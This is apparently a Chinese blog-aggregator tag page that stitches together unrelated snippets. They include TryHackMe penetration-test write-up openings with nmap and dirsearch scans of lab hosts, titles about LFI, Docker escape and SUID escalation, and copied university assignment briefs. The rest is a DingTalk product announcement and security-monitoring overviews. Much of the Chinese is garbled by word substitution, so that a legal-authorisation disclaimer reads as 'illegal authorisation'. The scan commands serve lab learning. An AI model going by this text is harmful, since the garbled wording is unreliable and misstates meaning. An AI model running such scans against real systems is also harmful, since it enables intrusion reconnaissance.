免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/tryhackme/Lian_Yu]└─# nmap -sV -Pn 10.10.174.43 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 05:22 EDTNmap scan report for 10.10.174.43Host is up (0.30s latency).Not shown: 65530 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)80/tcp open http Apache httpd111/tcp open rpcbind 2-4 (RPC #100000)59642/tcp open status 1 (RPC #100024)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 3585.05 secondsftp尝试登录尝试用anonymous和Lian_Yu登录ftp,显示Permission denied ...

November 5, 2021 · 4 min · jiezi

关于安全:TryhackmedogcatLFI文件解析漏洞Docker逃逸

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.228.190 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 01:40 EDTNmap scan report for 10.10.108.119Host is up (0.31s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.38 ((Debian))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 39.93 seconds目录爆破,只有cat和dog两个已知文件夹,各有10张图片┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.108.119" -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-23_01-46-47.logTarget: http://10.10.108.119[01:46:48] Starting: [01:46:49] 200 - 418B - /[01:47:04] 301 - 311B - /cats -> http://10.10.108.119/cats/[01:47:10] 301 - 311B - /dogs -> http://10.10.108.119/dogs/[01:52:19] 403 - 277B - /server-status 经剖析验证首页view参数存在一个LFI,并且结构参数肯定要蕴含cat或者dog,否则会显示Sorry, only dogs or cats are allowed.并且文件后缀增加了.php,咱们预计源代码大略是这样的 ...

November 3, 2021 · 3 min · jiezi

关于安全:Tryhackme-ArchangelLFI文件解析漏洞getshell修改PATH路径SUID提权

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。发现服务┌──(rootkali)-[~/tryhackme/Archangel]└─# nmap -sV -Pn 10.10.228.134 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 05:43 EDTNmap scan report for 10.10.228.134Host is up (0.32s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds浸透80端口爆破目录┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.228.134 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.228.134/_21-10-29_06-02-36.txtError Log: /root/dirsearch/logs/errors-21-10-29_06-02-36.logTarget: http://10.10.228.134/[06:02:37] Starting: [06:03:59] 301 - 312B - /flags -> http://10.10.228.134/flags/ [06:04:06] 301 - 313B - /images -> http://10.10.228.134/images/ [06:04:06] 200 - 0B - /images/ [06:04:08] 200 - 19KB - /index.html [06:04:29] 301 - 312B - /pages -> http://10.10.228.134/pages/ [06:04:30] 200 - 0B - /pages/ [06:04:44] 403 - 277B - /server-status /flags 转向youtube一个视频,没有其余信息,应该是个兔子洞其余文件夹没有其余信息 ...

November 3, 2021 · 3 min · jiezi

关于安全:官方剧透一图看懂腾讯安全2021腾讯数字生态大会

November 1, 2021 · 0 min · jiezi

关于安全:Secure-Programming

Assignment 4 — Secure Programming 2021In this assignment you will fuzz a memory allocation library. You should write a driver program thatexercises the library based on the input it accepts. The program should support one of two behaviours:• Pseudo-random driver: The program reads a number from stdin, uses this number to initialise apseudo-random number generator, which it uses to determine the sequence of operations on the heap.For this, we provide two functions:– void sp seed(uint32 t seed), which takes a seed and initialises a pseudo-random-number generator.– uint32 t sp rand(), which returns the next pseudo-random number.To ensure reproducibility, you may only use our random number generator as a source of randomness.• A driver for an external fuzzer: The program assumes that an external fuzzer, such as AFL,produces a sequence of characters, which the program reads from stdin. This sequence of charactersdetermines the sequence of operations the program performs.Your driver program should be deterministic, i.e. if it gets the same input, it should perform the samesequence of operations. The sequence of operations it generates should be correct, and should never fail ifthe underlying malloc library is correct.malloc library:The file spalloc.c contains an implementation of a malloc library. To facilitate debugging, we renamed thefunctions to sp malloc, sp calloc, sp free, and sp realloc. However, with the exception of the bugs weintroduced, the functionality is identical to malloc, calloc, free, and realloc, respectively. The code isonly tested on 64-bit Linux. It is unlikely to work on 32-bit Linux. We do not know what happens on Macor on Windows. We also provide the matching header file spalloc.h.To further assist with debugging, compiling spalloc.c with the flag -DSP FAKE replaces the implementationwith calls to the standard malloc library, providing a known correct implementation.To build the code, you need to modify the code, by setting the value of the macro STUDENTNUM to yourstudent number. (Seven digits, without the ‘a’.)The code contains three known non-trivial bugs. Your aim is to identify, triage and fix these bugs. To getmarks for any of the bugs, your submitted solution should include an input that causes your test programto crash. Note that changing STUDENTNUM may change the behaviour of the code. To get marks, the failshould happen when STUDENTNUM is set to your student number. You will not get any marks for describingor correcting bugs that you cannot reproduce with your student number and your driver program.Marking ...

October 29, 2021 · 4 min · jiezi

关于安全:TryhackmeHacker-of-the-Hill-1

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。Easy Challenge服务发现┌──(rootkali)-[~/tryhackme/hackerhill]└─# nmap -sV -Pn 10.10.134.251 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 04:36 EDTNmap scan report for 10.10.134.251Host is up (0.31s latency).Not shown: 994 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))8001/tcp open http Apache httpd 2.4.29 ((Ubuntu))8002/tcp open http Apache httpd 2.4.29 ((Ubuntu))9999/tcp open abyss?爆破8000端口的目录──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u 10.10.134.251:8000 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100Error Log: /root/dirsearch/logs/errors-21-10-25_04-57-13.logTarget: 10.10.134.251:8000 [04:57:13] Starting: [04:57:22] 200 - 2KB - /about [04:57:33] 200 - 2KB - /contact [04:57:47] 500 - 613B - /public_html/robots.txt [04:57:47] 200 - 30B - /robots.txt robots.txt显示有一个cms ...

October 29, 2021 · 12 min · jiezi

关于安全:COMP90043加密算法

COMP90043Department of Computing and Information SystemsCOMP90043-CRYPTOGRAPHY AND SECURITYPractice Exam 2021Exam Duration: 15 minutes reading + 120 minutes Exam writing;Instructions to Students: Total marks for the exam is 40 (Worth 40% of the final mark in the subject). Note that you should complete writing the exam within 2.15 minutes. Then you willhave 30 minutes to scan and uplaod the work. Other exam rules apply. The exam will have two parts: Part A is a quiz on canvas, Part B is this assignmentand will have 10 questions. The test is open book, which means you may only use course materials providedvia the LMS or the text book but must not use any other resource including theInternet. You also must not contact or communicate with any other person (other than teach-ing team) or make use of the Internet. Solutions must be written on blank A4 page paper with pen and pencil. You mustwrite your solutions to each question on a new sheet of paper by clearly identifyingthe question number. You must not use tablet or any electronic device to generate your solution. Scanning instructions are already made available on Canvas in an announcement.Page 1 of 13 continued on next pagePart A (Q1-3Please complete the Quiz on Canvas available at Assignments - Practice Exam - Part APart B: This Assignment: ...

October 29, 2021 · 8 min · jiezi

关于安全:Secure-Programming

Assignment 4 — Secure Programming 2021In this assignment you will fuzz a memory allocation library. You should write a driver program thatexercises the library based on the input it accepts. The program should support one of two behaviours:• Pseudo-random driver: The program reads a number from stdin, uses this number to initialise apseudo-random number generator, which it uses to determine the sequence of operations on the heap.For this, we provide two functions:– void sp seed(uint32 t seed), which takes a seed and initialises a pseudo-random-number generator.– uint32 t sp rand(), which returns the next pseudo-random number.To ensure reproducibility, you may only use our random number generator as a source of randomness.• A driver for an external fuzzer: The program assumes that an external fuzzer, such as AFL,produces a sequence of characters, which the program reads from stdin. This sequence of charactersdetermines the sequence of operations the program performs.Your driver program should be deterministic, i.e. if it gets the same input, it should perform the samesequence of operations. The sequence of operations it generates should be correct, and should never fail ifthe underlying malloc library is correct.malloc library:The file spalloc.c contains an implementation of a malloc library. To facilitate debugging, we renamed thefunctions to sp malloc, sp calloc, sp free, and sp realloc. However, with the exception of the bugs weintroduced, the functionality is identical to malloc, calloc, free, and realloc, respectively. The code isonly tested on 64-bit Linux. It is unlikely to work on 32-bit Linux. We do not know what happens on Macor on Windows. We also provide the matching header file spalloc.h.To further assist with debugging, compiling spalloc.c with the flag -DSP FAKE replaces the implementationwith calls to the standard malloc library, providing a known correct implementation.To build the code, you need to modify the code, by setting the value of the macro STUDENTNUM to yourstudent number. (Seven digits, without the ‘a’.)The code contains three known non-trivial bugs. Your aim is to identify, triage and fix these bugs. To getmarks for any of the bugs, your submitted solution should include an input that causes your test programto crash. Note that changing STUDENTNUM may change the behaviour of the code. To get marks, the failshould happen when STUDENTNUM is set to your student number. You will not get any marks for describingor correcting bugs that you cannot reproduce with your student number and your driver program.Marking ...

October 28, 2021 · 4 min · jiezi

关于安全:TryhackmeChill-Hack命令行注入用户组提权docker

免责申明本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。服务发现┌──(rootkali)-[~/tryhackme/chillhack]└─# nmap -sV -Pn 10.10.49.122Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-27 09:47 EDTNmap scan report for 10.10.49.122Host is up (0.33s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 25.23 seconds开启的服务有ftp,ssh,http ...

October 28, 2021 · 4 min · jiezi

关于安全:ApacheCN-网络安全译文集-20211025-更新

Android 浸透测试学习手册 中文版 第一章 Android 平安入门第二章 筹备试验环境第三章 Android 利用的逆向和审计第四章 对 Android 设施进行流量剖析第五章 Android 取证第六章 玩转 SQLite第七章 不太出名的 Android 破绽第八章 ARM 利用第九章 编写浸透测试报告SploitFun Linux x86 Exploit 开发系列教程 典型的基于堆栈的缓冲区溢出整数溢出Off-By-One 破绽(基于栈)应用 return-to-libc 绕过 NX bit应用链式 return-to-libc 绕过 NX bit绕过ASLR -- 第一局部绕过ASLR -- 第二局部绕过ASLR -- 第三局部了解 glibc malloc应用 unlink 的堆溢出应用 Malloc Maleficarum 的堆溢出Off-By-One 破绽(基于堆)开释后应用浅入浅出 Android 平安中文版格式化字符串破绽利用 一、引言二、格式化函数三、格式化字符串破绽四、利用的变体五、爆破六、非凡案例七、工具参考文献安卓利用平安指南 中文版 一、简介二、本书构造三、平安设计和编程的基础知识四、以平安形式应用技术 4.1 创立或应用流动4.2 接管/发送播送4.3 创立/应用内容供应器4.4 创立/应用服务4.5 应用 SQLite4.6 解决文件4.7 应用可浏览的用意4.8 输入到 LogCat4.9 应用WebView4.10 应用告诉五、如何应用平安性能 5.1 创立明码输出界面5.2 权限和爱护级别5.3 将外部账户增加到账户管理器5.4 通过 HTTPS 的通信5.5 解决隐衷数据5.6 密码学5.7 应用指纹认证性能六、艰难问题Web Hacking 101 中文版 ...

October 26, 2021 · 2 min · jiezi

关于安全:钉钉宜搭30发布易连接酷数据更安全

简介: 10月20日,在2021云栖大会低代码分论坛上,阿里巴巴资深技术专家叶周全(花名勇猛)公布钉钉宜搭3.0版本。 10月20日,在2021云栖大会低代码分论坛上,阿里巴巴资深技术专家叶周全(花名勇猛)公布钉钉宜搭3.0版本,重磅公布3大连贯能力套件,让业务互联互通;公布更低门槛的数据BI能力,一键生成酷炫数字大屏;公布全局水印、独立域名等平安能力,为用户提供国密级专属平安。叶周全认为,低代码作为一种新生产力工具,正在一直激发集体的创新力,全面减速企业的数字化转型。 这是宜搭在往年1月亮相钉钉6.0发布会以来,首次新品公布。随着企业数字化需要的一直增长,钉钉上的低代码利用数冲破120万,其中宜搭利用数破100万,低代码让越来越多的企业和组织找到了高效、低成本的数字化翻新门路,也让个体的需要失去了满足,让集体更有取得感。 会上,宜搭创始人叶周全总结了低代码倒退的三个阶段,别离是1.0阶段的流程在线、2.0阶段的业务在线和3.0阶段的生态在线。回溯钉钉宜搭的倒退,在1.0阶段,钉钉宜搭解决了由BPM驱动下的流程在线、挪动审批。到2.0时,钉钉宜搭通过元数据驱动帮忙用户疾速实现业务在线和挪动办公。 “当初钉钉宜搭已处于3.0阶段,由数据驱动实现生态在线、业务连贯、互联互通。”叶周全介绍,“在3.0阶段,钉钉宜搭最终要实现生态在线,既包含了厂商上、上游的生态,也包含业务的连贯生态。” 叶周全还示意,宜搭的疾速成长离不开长期保持“与客户共创”的文化理念。9个月的工夫,宜搭与150多位用户深度共创,累计收到3300多条用户声音,这些贵重的声音一直推动着产品以每两周一个迭代的速度向前推动。 连贯的效率和深度,决定了企业的生产力。宜搭正在让连贯变得更简略、深刻和个性化。本次宜搭重磅公布了3大连贯能力套件:Excel一键降级企业数字化利用,宜搭连接器以及跨组织流程审批和利用散发,实现了利用与利用之间,利用与人之间,企业上下游之间的全链路连贯,宜搭搭建的利用在钉钉上人造互联互通。 叶周全提到,宜搭全新上线的连接器性能和钉钉一方、三方互联互通,宜搭利用实现跟钉钉、钉钉市场SaaS利用及企业存量利用的无缝买通,连贯数据孤岛,让业务互联互通。 昆山一家制作企业的CIO在承受采访时示意,宜搭让企业可能自行搭建更贴合业务需要的利用,尤其是最新上线的连接器极大地晋升了公司业务的数字化能力。过来,洽购物料要先向采购部提交申请,再到SAP零碎录入订单,有时遗记去SAP录入,就会导致漏单。当初有了宜搭连接器,只须要在宜搭中进行请购单申请,审批实现后主动进入SAP零碎,让业务一单到底。仅此一项,就为公司节俭了至多10万元的费用。 本次宜搭全新公布了20多款罕用报表可视化组件,以及10多款开箱即用的可视化炫酷大屏模版,涵盖销售、人事、生产制作等诸多畛域,可宽泛用于展现汇报、指挥决策,业务剖析等场景。反对100万数据量的表与表关联,和一亿数据量的海量数据处理能力。叶周全认为,数据是企业最贵重的资产,宜搭利用产生的数据能以更科学合理的形式进行剖析,让企业实现数据互联成为可能,助力企业摸索“科技上云”新实际。 爱护客户的数据安全是第一准则,宜搭平台依靠钉钉全面的平安防护策略,取得公安部信息系统三级等级爱护认证,数据享受国密级别平安爱护。放心外围数据被透露?宜搭上线利用全局水印性能,一旦产生信息透露可疾速追溯起源。对立风控账号体系+独立企业域名,筑起平安高墙,为企业提供专业级平安防护。 在本次低代码峰会上,宜搭还首次公布了生态搭档招募打算,成立百万、千万俱乐部,提供专属反对、商机渠道,推出产品共创、精英班等多种策略单干模式,携手行业搭档共建低代码生态,一起服务好客户,一起以客户为核心,帮忙客户胜利。 “旧时王谢堂前燕,飞入寻常百姓家。让数字技术普惠每一家企业,每一个个体,是咱们的使命。”叶周全提到,低代码利用将来将向着“人人、专属和翻新”三个趋势倒退。将来的软件开发将会走向专业化、更细分,企业能够更轻松地构建专属利用,通过激发集体的创造力,让渺小的翻新更容易产生。 原文链接本文为阿里云原创内容,未经容许不得转载。

October 26, 2021 · 1 min · jiezi

关于安全:机房监控系统方案

数据中心机房的监控零碎蕴含多个方面,不仅仅是视频监控而已。当数据中心机房在呈现危险时,通过监控零碎就可能及时发现问题,并及时扼杀。在数据中心机房中的任何中央、任何运行零碎均会有呈现问题的可能,监控零碎的笼罩在肯定水平上影响着数据中心机房的运行稳定性。 为了应答数据中心所面临的治理简单、治理难、不直观等诸多问题,就需制订一套欠缺的数据中心动环治理解决方案,业余能力进一步晋升数据中心用户治理体验及效率。 零碎解决方案 监控零碎次要是针对UPS、配电、温湿度、精细空调、一般空调、市电、蓄电池、漏水、新风机、烟感、红外、门禁、消防、防雷、电话、短信、视频、服务器、路由器、交换机等监控项。 当零碎检测到的数据超过用户设定的下限或是上限时,可依据用户需要短信、语音报警、声光报警、WEB弹窗、邮箱等多种形式发送告警信息告诉相干人员,及时处理异样问题。 机房能源环境监控零碎介绍: 1.零碎能够对机房空调参数进行历史曲线记录,并可随时查看任意一天的曲线记录; 2.零碎能对机房精细空调各部件的运行状态和运行参数进行监控。例如:压缩机、滤网、风机、加热器、加湿器、去湿器、通风安装等部件运行或进行的情况,管理员能够通过网络实时查看空调运行参数; 3.机房空调监控分为精细空调监控和一般空调监控,零碎应能实现对两类空调的监控,一般空调监控性能包含开关机、设定工作模式、设定温度、风速等,除上述要求外,还应具备复电自启性能,监控零碎不许改变空调外部线路,防止产生事故隐患。 4.受权用户可通过软件在监控机上或通过网络近程批改空调(精细空调和一般空调)设置温度、制冷制热模式等参数,并实现空调的近程开关机。要求零碎记录操作人员及操作事件。零碎—旦监测到有报警或参数越限,可能主动报警; 一、机房监控零碎监测画面温湿度: 1.依据事后的设定,零碎能够对机房温湿度参数和状态异样设定主动报警; 2.零碎能够对机房温湿度参数进行历史曲线记录,并可随时查看任意一天的曲线记录; 3.零碎能对机房温湿度实时监督,显示并记录其运行数据。零碎反对机房电子地图显示温湿度散布; 二、机房能源环境监控零碎消防子系统调用烟雾实时监测画面漏水子系统: 1.零碎能对机房可能的漏水区域实时监督,显示并记录其运行数据; 2.零碎采纳电子地图形式形象地显示理论漏水检测绳的散布; 3.零碎应选用精确定位漏水监测设施,一旦产生漏水,应在监控画面上主动标示漏水地位; 4.一旦检测到漏水,零碎能够显示其理论漏水地位,并在电子地图上形象显示; 三、机房能源环境监控零碎监测画面 1.通过机房电子地图,调用烟雾实时监测画面; 2.零碎应记录相干事件以备查问 3.零碎产生报警时可依据须要发出报警提醒、联动门禁系统关上相应逃生通道,让工作人员迅速撤退灾祸现场; 四、UPS不间断电源子系统监测画面 1.零碎要能对机房UPS各部件的运行状态进行监控。如:UPS的各开关、整流器、电池、逆变器、旁路及输入等各局部的状态。要求零碎表明UPS电流流向,可看到负载的供电情况,是否受爱护等; 2.零碎要能对机房UPS各部件的参数状态进行监控,如:电压、电流、频率、功率、后备工夫等;整流器与旁路的电压、电流参数;逆变器与电池的电压、电流及电池的后备工夫、充电量,负载的电压、电流参数,并合理布局、形象显示; 3.系统对机房UPS参数进行历史曲线记录,并可随时查看任意一天的曲线记录; 五、动环监控零碎特点和劣势 零碎特点 1、监控具备模块化、自在配置的特点; 2、即插即用,不须要专业人士上门领导; 3、宽泛兼容,实现多种设施集中管理; 4、从本地到云端灵便的部署形式,信息安全有保障; 5、应用领域宽泛,都能够轻易反对您的部署环境; 6、特地针对中小型环境提供动环监控解决方案,大大节俭了老本。 零碎劣势 1、集成服务平台:对立数据流,将数据、视频、音频等各种业务集成到一个服务平台真三维,全实景:可视化的3D治理平台,实现所有IT基础设施和环境等我的项目的可视化治理。 2、多个子系统:包含交换配电、UPS、空调、温湿度、漏水、蓄电池、消防、图像、门禁等既反对单机房,也反对多机房:分级接入上万个机房设备,多级架构设计。 3、GIS(地理信息系统):反对大规模的站点设施运维和实时的电子地图嵌入式设施:重要设施均采纳嵌入式设施,以保证系统的稳定性。

October 25, 2021 · 1 min · jiezi

关于安全:基于敏感词过滤的反垃圾系统

以后的我的项目曾经开源,点击这里 内容平安是以后平安风控体系健身中十分重要的一环。一方面,无论是小程序还是APP,在上架过程中面临很多监管的要求,这一环搞不好就要面临下架的危险,另一方面,关键词屏蔽自身就是业务需要的一部分,比方屏蔽某个竞对的外链等。 市面上曾经很多大的云厂商和一些专门做风控畛域的厂商提供这方面的服务,但次要存在以下的痛点: 思考到各种乙方使用者的通用性,无论是API设计和control platform都存在大量冗余的设计;导致一个本来非常简单的场景在付出很大的接入和保护老本;当面临一些个性化的需要时,三方又不能满足,即使能给技术支持,因为排期过长时效性很差;误判率高;各三方提供方有所差别;一些机器学习的模型,误判率很高,而且呈现问题后不好调整,造成很差的用户体验;在量很大的状况下,每个月的老本收入还是不小的一块老本;在此基础上,能不能设计一个即简略又不失灵便,能够满足根底的监管要求(这块次要是看关键词)又能够满足日常一些关键词屏蔽的业务需要呢? 针对下面的想法,开发一个绿盾的我的项目, 次要采纳以下三种匹配过滤形式; 根底的关键词匹配;这块次要是解决词库很大的状况下,匹配效率的问题;当初比拟支流的算法是应用DFA算法,来做词匹配;另外为了解决一些关键词匹配有余的问题,提出的组合词策略;比方,在商品形容中,呈现象牙是不容许售卖的,所以把象牙加到关键词当中,然而如果呈现象牙白和仿象牙等形容词,就会被替换成**白通过分词能够解决一部分这个问题;最初还有极少量的场景,如果1,2都无奈解决,那么采纳正则表达式的形式来解决;除了满足根本的匹配性能之外,还有一些定制化的性能;比方能够通过client通过传递的参数来匹配本人的词库; 对于工程化的一些需要: 对微服务形式部署的反对; 如果存储到文件中,如果部署多套,那么保护老本是比拟高的;这时候尽量采纳数据库形式;词库更新的问题; 词库产生变更后,比方加词后或者删除词后,如何实现热加载。个别有两种形式: 通过另外一个服务被动告诉的形式;这种告诉形式能够是通过调用API接口,也能够是放弃长链,推送小时的形式;但不论怎么样,都会减少额定的服务;服务通过定时轮询数据,比照是否产生变动;来实现自动更新;因为服务自身定位一个轻量级的服务,如果再退出其它服务,自身就有点重了,所以最终还是定期轮询的形式来实现热更新。在一个写的频率非常低,读的频率十分高的状况下,如果每次把所有的词都加载进去,而后diff下,老本还是比拟高;最终抉择的计划是减少一个words_info的表来记录每个词库的最初更改工夫;每次加载的时候,只须要加载words_info表,比照每个词库的最初更改工夫,如果工夫产生变更,那么再从新加载词库,生成新的tree即可;

October 25, 2021 · 1 min · jiezi

关于安全:平安校园安防系统解决方案

校园平安作为一个国家公共安全畛域比拟重要的局部,始终以来都受到分外器重。近两年,国家与中央政府陆续公布了多项增强校园平安治理的政策、法规及标准规范,提出要不断完善学校的人防、物防、技防,构建“安全校园”建设。 在校园内公共区域安排和更新监控设施就是其中重要的一环,想必小伙伴们都“身”有领会,走在校园里,处处都能见到监控设施,比方路线上的摄像头,在路边摆放的报警柱等。 这些监控次要散布在人员密集的公共区域,例如校园内次要干道、次要楼宇的门厅及楼宇周边,重要的科研机构和公共的教学楼。它们的重要性能就是24h监控周边环境变动, 捍卫同学们的财产平安。上面咱们就来理解一下校园安防有哪些用途吧。校园安防的特点 学校的安防零碎与一般安防有共通之处,但也有很多本人的特点和要求:1.监控点多:学校人员密集,要求监控到校区每一个角落。因而须要在学校内每栋宿舍的走廊、楼厅、天花板处都装有摄像探头,但监督范畴不包含宿舍外部,防止进犯学生的隐衷。2.监控面积大:学校的校园面积个别较大,监控点多。要求零碎反对多种布线形式,最好可利用现成线路,或充许多个子系统绝对独立,不便施工及保护。 3.要求近程报警:当学生及教职工离校后,可启动近程挪动报警,各监控点产生人员侵入,可通过网络将警情上传至网络监控核心,并将图像主动切换到现场,并主动录像,便于及时采取措施。 4.可避免校园暴力:当校园暴力事件产生或可能产生时,各级人员均可触动紧急按钮,向110报警核心报警,预防或禁止校园暴力事件。 5.可意外挫伤取证:对学生在校期间,要能对所有监控点进行录像,不便发生意外挫伤时,被动举证。 6.可作其它利用:安防零碎要与学校日常工作相结合,最大限度地发挥作用。 校园安防零碎的利用及性能 校园安防零碎,以校园网为外围,可充分利用已有线路,或依据布线的难易,在学校内同时采纳不同的设施,设立多个子系统。目前视频监控零碎正处在从以DVR为外围的构造,向以分布式、网络化、智能化、扩散的以每个视频点为根底的转变过程中。报警零碎正在从一个独自的零碎或视频零碎辅助局部,向和视频零碎一起作为安防零碎中两个重要的组成部分,并交融为一个对立整体的方向倒退,并且逐步成为安防零碎新的设计标准。 校园监控系统结构监控核心系统结构校园监控零碎组成 学校校园安防零碎由前端设施、信号传输和监控室三局部组成; 1、前端设施包含各类监控摄像机,红外对射报警器和报警按钮等实现前端信息的采集;报警零碎可实现与视频监控等联动; 2、监控室实现对监控零碎对立治理和管制,并负责视频图像的存储记录,监控客户端通过监控零碎客户软件实现对监控零碎的拜访、管制和治理; 3、监控零碎的图像品质和应用成果与信号的传输非亲非故,所以设计时必须思考适合的信号传输方式。 整个学校校园监控零碎能够分为三道防线:报警零碎设计 报警零碎的作用就是利用各种类型的探测安装,对建筑物外围区域或外部进行布防,它可探测非法侵入,并且在探测到非法侵入或被动触发报警按钮时及时向无关人员示警。保安人员获取入侵者方位,并迅速采取相应措施。一个欠缺的安防体系除了具备现代化的报警设施,还应包含训练有速的响应力量,即警卫力量,将人防与技防迷信的联合实现平安捍卫的重任。 报警零碎结构图如下:报警零碎组成 报警零碎由以下几局部组成: 1)报警探测器:探测和执行设施,负责探测非法入侵者; 2)报警控制中心:负责布防与撤防,响应报警信号,联动其余零碎。 依据标准要求,各探测器收回报警信号至零碎主机提醒有警情产生的零碎报警反应时间≤1秒。 监控与报警联动 前端报警设施与数字硬盘录像机报警输出端口相连,通过信号量的形式与视频图像联动和触发声光报警,报警输出口接管到报警信息后,产生相应的联动信息。报警流程图如图所示。 报警治理 通过报警转发服务器实现对技防联网报警、视频挪动侦测报警、视频失落报警、设施状态报警等所有报警进行对立的治理; 能够定义报警源、联动规定,通过报警引擎主动关联实时视频和启动录像,启动现场声、光、门等设施,并将不同的报警信息发送给不同业务主管部门; 接管到报警后能够主动联动事后定义的关联监控点视频,主动启动快球预置位,也能够手动抉择左近监控点图像进行视频验证复核和录像; 所有报警信息主动保留到数据库,能够统计、查问和打印,能够通过报警事件来检索录像材料; 通过对报警转发和联动规定的定义,能够通过手机短信将报警信息发送给相应的值班人员和主管领导; 系统故障、磁盘清理等信息也能够通过手机短信发送给系统维护人员,告诉保护人员及时到场进行培修保护解决。 “安全校园”的建设离不开学校的精心投入,离不开相干工作人员的默默付出。然而即便有欠缺的安保零碎,然而增强本身的安全意识也是必不可少的。心愿小伙伴们进步安全意识和维权意识。

October 25, 2021 · 1 min · jiezi

关于安全:MATH2019

MATH2019 Introduction to Scientific Computation— Coursework 1 (10%) —Submission deadline: 3pm, Tuesday, 2 Nov 2021Note: This is currently version 2.2 of the PDF document. (19th October, 2021)Further questions will be added to this PDF in the upcoming weeks.This coursework contributes 10% towards the overall grade for the module.Rules:• Each student is to submit their own coursework.• You are allowed to work together and discuss in small groups (2 to 3 people), but you must write yourown coursework and program all code by yourself.• Please be informed of the UoN Academic Misconduct Policy (incl. plagiarism, false authorship, andcollusion).Coursework Aim and Coding Environment:• In this coursework you will develop Python code related to algorithms that solve nonlinear equations,and you will study some of the algorithms’ behaviour.• As discussed in the lecture, you should write (and submit) plain Python code (.py), and you are stronglyencouraged to use the Spyder IDE (integrated development environment). Hence you should not writeIPython Notebooks (.ipynb), and you should not use Jupyter).How and Where to run Spyder:• Spyder comes as part of the Anaconda package (recall that Jupyter is also part of Anaconda). Hereare three options on how to run Spyder:(1) You can choose to install Anaconda on you personal device (if not done already).(2) You can open Anaconda on any University of Nottingham computer.(3) You can open a UoN Virtual Desktop on your own personal device, which is virtually the same aslogging onto a University of Nottingham computer, but through the virtual desktop. The simply openAnaconda. Here is further info on the UoN Virtual Desktop.• The A18 Computer Room in the Mathematical Sciences building has a number of computers available,as well as desks with dual monitors that you can plug into your own laptop.Online 1-on-1 Support and Time-tabled Support Sessions (Thu 3-4pm, Wed 9-10am):• You can work on the coursework whenever you prefer.• We especially encourage you to work on it during the time-tabled computing and drop-in sessions(Thursdays 3-4pm and Wednesdays 9-10am). There is no need to come to the time-table allocatedlocations, as you can obtain online 1-on-1 support via MS Teams from PGR Student Teaching Assistants.• To obtain online 1-on-1 support during these sessions, please join the MATH2019 